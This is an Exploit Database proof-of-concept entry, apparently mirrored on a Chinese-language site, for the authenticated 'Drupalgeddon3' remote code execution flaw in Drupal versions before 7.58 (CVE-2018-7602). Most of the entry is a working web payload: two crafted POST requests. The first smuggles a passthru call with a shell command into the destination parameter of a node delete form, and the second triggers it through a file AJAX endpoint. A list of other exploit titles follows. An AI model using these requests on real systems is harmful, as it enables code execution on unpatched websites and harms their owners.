Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)

Exploit Database
16 阅读

作者： Blaklis

日期： 2018-04-25
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/44542/

This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.

You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).

POST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1
[...]
form_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]

Retrieve the form_build_id from the response, and then triggering the exploit with : 

POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1
[...]
form_build_id=[FORM_BUILD_ID]

This will display the result of the whoami command.

Patch your systems!
Blaklis

last Exploits
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)的更多信息

Online Learning Management System 1.0 – ‘id’ SQL Injection：
Plogger 1.0 RC1 – ‘gallery_name’ Cross-Site Scripting：
Social Media – ‘index.php’ Local File Inclusion：
HasanMWB 1.0 – SQL Injection：
Z-Blog 1.5.1.1740 – Cross-Site Scripting：
Fibaro Home Center 2 – Remote Command Execution / Privilege Escalation：
WordPress Plugin Supsystic Data Tables Generator 1.9.96 – Multiple Vulnerabilities：
D-Link DIR-635 – Multiple Vulnerabilities：